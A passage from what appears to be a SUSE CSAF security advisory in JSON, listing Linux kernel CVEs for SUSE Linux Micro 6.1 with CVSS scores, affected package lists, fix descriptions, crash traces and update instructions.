"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40106"
},
{
"cve": "CVE-2025-40123",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40123"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Enforce expected_attach_type for tailcall compatibility\n\nYinhao et al. recently reported:\n\n Our fuzzer tool discovered an uninitialized pointer issue in the\n bpf_prog_test_run_xdp() function within the Linux kernel\u0027s BPF subsystem.\n This leads to a NULL pointer dereference when a BPF program attempts to\n deference the txq member of struct xdp_buff object.\n\nThe test initializes two programs of BPF_PROG_TYPE_XDP: progA acts as the\nentry point for bpf_prog_test_run_xdp() and its expected_attach_type can\nneither be of be BPF_XDP_DEVMAP nor BPF_XDP_CPUMAP. progA calls into a slot\nof a tailcall map it owns. progB\u0027s expected_attach_type must be BPF_XDP_DEVMAP\nto pass xdp_is_valid_access() validation. The program returns struct xdp_md\u0027s\negress_ifindex, and the latter is only allowed to be accessed under mentioned\nexpected_attach_type. progB is then inserted into the tailcall which progA\ncalls.\n\nThe underlying issue goes beyond XDP though. Another example are programs\nof type BPF_PROG_TYPE_CGROUP_SOCK_ADDR. sock_addr_is_valid_access() as well\nas sock_addr_func_proto() have different logic depending on the programs\u0027\nexpected_attach_type. Similarly, a program attached to BPF_CGROUP_INET4_GETPEERNAME\nshould not be allowed doing a tailcall into a program which calls bpf_bind()\nout of BPF which is only enabled for BPF_CGROUP_INET4_CONNECT.\n\nIn short, specifying expected_attach_type allows to open up additional\nfunctionality or restrictions beyond what the basic bpf_prog_type enables.\nThe use of tailcalls must not violate these constraints. Fix it by enforcing\nexpected_attach_type in __bpf_prog_map_compatible().\n\nNote that we only enforce this for tailcall maps, but not for BPF devmaps or\ncpumaps: There, the programs are invoked through dev_map_bpf_prog_run*() and\ncpu_map_bpf_prog_run*() which set up a new environment / context and therefore\nthese situations are not prone to this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40123",
"url": "https://www.suse.com/security/cve/CVE-2025-40123"
},
{
"category": "external",
"summary": "SUSE Bug 1253365 for CVE-2025-40123",
"url": "https://bugzilla.suse.com/1253365"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40123"
},
{
"cve": "CVE-2025-40134",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40134"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm: fix NULL pointer dereference in __dm_suspend()\n\nThere is a race condition between dm device suspend and table load that\ncan lead to null pointer dereference. The issue occurs when suspend is\ninvoked before table load completes:\n\nBUG: kernel NULL pointer dereference, address: 0000000000000054\nOops: 0000 [#1] PREEMPT SMP PTI\nCPU: 6 PID: 6798 Comm: dmsetup Not tainted 6.6.0-g7e52f5f0ca9b #62\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.1-2.fc37 04/01/2014\nRIP: 0010:blk_mq_wait_quiesce_done+0x0/0x50\nCall Trace:\n \u003cTASK\u003e\n blk_mq_quiesce_queue+0x2c/0x50\n dm_stop_queue+0xd/0x20\n __dm_suspend+0x130/0x330\n dm_suspend+0x11a/0x180\n dev_suspend+0x27e/0x560\n ctl_ioctl+0x4cf/0x850\n dm_ctl_ioctl+0xd/0x20\n vfs_ioctl+0x1d/0x50\n __se_sys_ioctl+0x9b/0xc0\n __x64_sys_ioctl+0x19/0x30\n x64_sys_call+0x2c4a/0x4620\n do_syscall_64+0x9e/0x1b0\n\nThe issue can be triggered as below:\n\nT1 \t\t\t\t\t\tT2\ndm_suspend\t\t\t\t\ttable_load\n__dm_suspend\t\t\t\t\tdm_setup_md_queue\n\t\t\t\t\t\tdm_mq_init_request_queue\n\t\t\t\t\t\tblk_mq_init_allocated_queue\n\t\t\t\t\t\t=\u003e q-\u003emq_ops = set-\u003eops; (1)\ndm_stop_queue / dm_wait_for_completion\n=\u003e q-\u003etag_set NULL pointer!\t(2)\n\t\t\t\t\t\t=\u003e q-\u003etag_set = set; (3)\n\nFix this by checking if a valid table (map) exists before performing\nrequest-based suspend and waiting for target I/O. When map is NULL,\nskip these table-dependent suspend steps.\n\nEven when map is NULL, no I/O can reach any target because there is\nno table loaded; I/O submitted in this state will fail early in the\nDM layer. Skipping the table-dependent suspend logic in this case\nis safe and avoids NULL pointer dereferences.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40134",
"url": "https://www.suse.com/security/cve/CVE-2025-40134"
},
{
"category": "external",
"summary": "SUSE Bug 1253386 for CVE-2025-40134",
"url": "https://bugzilla.suse.com/1253386"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40134"
},
{
"cve": "CVE-2025-40135",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40135"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: use RCU in ip6_xmit()\n\nUse RCU in ip6_xmit() in order to use dst_dev_rcu() to prevent\npossible UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40135",
"url": "https://www.suse.com/security/cve/CVE-2025-40135"
},
{
"category": "external",
"summary": "SUSE Bug 1253342 for CVE-2025-40135",
"url": "https://bugzilla.suse.com/1253342"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40135"
},
{
"cve": "CVE-2025-40153",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40153"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm: hugetlb: avoid soft lockup when mprotect to large memory area\n\nWhen calling mprotect() to a large hugetlb memory area in our customer\u0027s\nworkload (~300GB hugetlb memory), soft lockup was observed:\n\nwatchdog: BUG: soft lockup - CPU#98 stuck for 23s! [t2_new_sysv:126916]\n\nCPU: 98 PID: 126916 Comm: t2_new_sysv Kdump: loaded Not tainted 6.17-rc7\nHardware name: GIGACOMPUTING R2A3-T40-AAV1/Jefferson CIO, BIOS 5.4.4.1 07/15/2025\npstate: 20400009 (nzCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\npc : mte_clear_page_tags+0x14/0x24\nlr : mte_sync_tags+0x1c0/0x240\nsp : ffff80003150bb80\nx29: ffff80003150bb80 x28: ffff00739e9705a8 x27: 0000ffd2d6a00000\nx26: 0000ff8e4bc00000 x25: 00e80046cde00f45 x24: 0000000000022458\nx23: 0000000000000000 x22: 0000000000000004 x21: 000000011b380000\nx20: ffff000000000000 x19: 000000011b379f40 x18: 0000000000000000\nx17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000\nx14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000\nx11: 0000000000000000 x10: 0000000000000000 x9 : ffffc875e0aa5e2c\nx8 : 0000000000000000 x7 : 0000000000000000 x6 : 0000000000000000\nx5 : fffffc01ce7a5c00 x4 : 00000000046cde00 x3 : fffffc0000000000\nx2 : 0000000000000004 x1 : 0000000000000040 x0 : ffff0046cde7c000\n\nCall trace:\n mte_clear_page_tags+0x14/0x24\n set_huge_pte_at+0x25c/0x280\n hugetlb_change_protection+0x220/0x430\n change_protection+0x5c/0x8c\n mprotect_fixup+0x10c/0x294\n do_mprotect_pkey.constprop.0+0x2e0/0x3d4\n __arm64_sys_mprotect+0x24/0x44\n invoke_syscall+0x50/0x160\n el0_svc_common+0x48/0x144\n do_el0_svc+0x30/0xe0\n el0_svc+0x30/0xf0\n el0t_64_sync_handler+0xc4/0x148\n el0t_64_sync+0x1a4/0x1a8\n\nSoft lockup is not triggered with THP or base page because there is\ncond_resched() called for each PMD size.\n\nAlthough the soft lockup was triggered by MTE, it should be not MTE\nspecific. The other processing which takes long time in the loop may\ntrigger soft lockup too.\n\nSo add cond_resched() for hugetlb to avoid soft lockup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40153",
"url": "https://www.suse.com/security/cve/CVE-2025-40153"
},
{
"category": "external",
"summary": "SUSE Bug 1253408 for CVE-2025-40153",
"url": "https://bugzilla.suse.com/1253408"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "low"
}
],
"title": "CVE-2025-40153"
},
{
"cve": "CVE-2025-40158",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40158"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: use RCU in ip6_output()\n\nUse RCU in ip6_output() in order to use dst_dev_rcu() to prevent\npossible UAF.\n\nWe can remove rcu_read_lock()/rcu_read_unlock() pairs\nfrom ip6_finish_output2().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
